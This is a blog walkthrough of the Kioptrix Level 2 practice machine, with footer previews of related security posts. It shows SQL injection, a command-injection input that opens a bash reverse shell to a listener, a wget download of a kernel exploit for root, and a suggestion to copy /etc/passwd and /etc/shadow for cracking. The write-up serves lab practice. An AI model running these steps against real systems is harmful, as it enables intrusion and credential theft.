Kioptrix Level 2 Walkthrough

-
Kioptrix level 2 is a boot-to-root machine. Let's hack this machine!

Setup is same as kioptrix level 1. So first, we need to find the ip address of the machine.


So,192.168.56.103 is the ip address of the Kioptrix level 2 machine.

Let's run nmap scan: 192.168.56.103



As per our scan, we have SSH, a website , CUPS and MySql running.

I tried connecting to ssh, nothing happened. Also, I couldn't find the exploit for this version openssh.

Website

Let's check out the website: http://192.168.56.103:80


Well, the website has a login form. Let's see if it is vulnerable for sql injection.

 Boom!! We got in! This might be vulnerable for command injection. Let's try.


Well, it is vulnerable to command injection!! We have apache user permissions. So, we need to try escalate our privileges to root by using a local privilege escalation. For that, let's find the details of OS version and linux kernel.


So, we have know that linux kernel version is 2.6.9-55 and OS is CentOS 4.5.

Let's look for the exploit:

Let's try the exploit 9542.c

First step is to start a python server hosting the exploit.

Second step is to create a reverse shell using bash. Check out this link : http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

We need to setup a listener using a netcat and execute the reverse shell code using command injection. ( your input should be "127.0.0.1;bash -i >& /dev/tcp/192.168.56.1/5000 0>&1" )
 

 Yes , we got our shell,. Let's change to a directory where we have a written permission( /tmp) and use wget to download the exploit https://www.exploit-db.com/exploits/9545 which is hosted locally. Compile it and execute it.

We got the root!!!

MYSQL

I could not really "hack" mysql but I did managed to find the login details of a user to mysql.


Let's check the database "webapp". 

It seems like the credentials of both john and admin accounts. We can use these credentials while logging into the website.

Things to do 

As usual, You can get /etc/passwd and /etc/shadow to crack the password. You can also add a user using your root shell and use that to login directly into the machine.


Comments

Post a Comment

Popular posts from this blog

Loading GootLoader

-
Image
  Disclaimer:  Opinions expressed are solely my own. N one of the ideas expressed in this blog post are shared, supported, or endorsed in any manner by my employer. In this blog, I will be taking a look at the initial GootLoader sample (MD5: 4dd369b5e028beebe3aa5c980960c502 , Sha256: c1029f0b5f4f6dfbe0fe656f075cbb5ccc2fc308087db21438d73394b75ea020).  Available  here:  https://bazaar.abuse.ch/sample/c1029f0b5f4f6dfbe0fe656f075cbb5ccc2fc308087db21438d73394b75ea020/   The sample is a javascript program which is meant to be executed in windows using wscript.exe.  Opening the sample in a text editor, it appears to look like jquery library 3.6.0 (screenshot below). Comparing the sample with jqeury 3.6.0 downloaded from  https://code.jquery.com/jquery-3.6.0.js, differences can be observed.  The following lines shows the code inserted to create the sample:  One important thing to mention about javascript: If a variable is declared without keywords such as var, it will be treated as global var
Read more

AUDI SQLi Labs Lesson 1 walkthrough

-
Image
Hi,Everyone! This post is about audi sqli labs lesson 1. Audi Sqli labs is a vulnerable web application which is designed for practicing various forms of sqli injection. You can download it from github: https://github.com/skyblueee/sqli-labs-php7 and follow this video: https://www.youtube.com/watch?v=Ri0e249x5PY for installation. Let's get started with lesson 1. Lesson 1: Let's add ?id=1 in the url. Well, this means that ?id=1 works. Now, let's try to break this query. You can try different values of id such as 10000000, asdwqe,@, ' etc. When you try ?id=1' , you will see an error message. Let's analyse the error. The important part is : ''1'' LIMIT 0,1'  Remove the first single quote: '1'' LIMIT 0,1 Remove "LIMIT 0,1" : '1'' This means that our given input is being enclosed in a single quote(').  You can fix the query while keeping the value of id as 1' by commenting out the
Read more

Kioptrix Level 1 walkthrough

-
Image
Kioptrix level 1 is one of the easiest boot-to-root machine. It is best suited for beginners to practice their pentesting skills. In this article, we will talk about how to hack kioptrix level 1. Kioptrix level 1 is Red-hat linux 32 bit machine which can easily be run with just 512 MB. You can download the virtual machine from the vulnhub. I hope the reader of this article can figure out how to setup this in a virtual machine. The host machine would be kali 2019.3. The virtualbox version is 6.0. So,after booting up the machine from the virtualbox, we need to find its ip address.We will use the tool netdiscover. The result: 192.168.56.102 is the kioptrix machine. Let's run a simple nmap scan using this ip address. The result: So, basically, we have 6 ports open. Port 22 is ssh using OpenSSH 2.9p2. Port 80 and 443 are using Apache 1.3.20 and mod_ssl version 2.8.4. We also have port 32768 and port 111 which seems to RPCs. Lastly, we have port 139 running samba but
Read more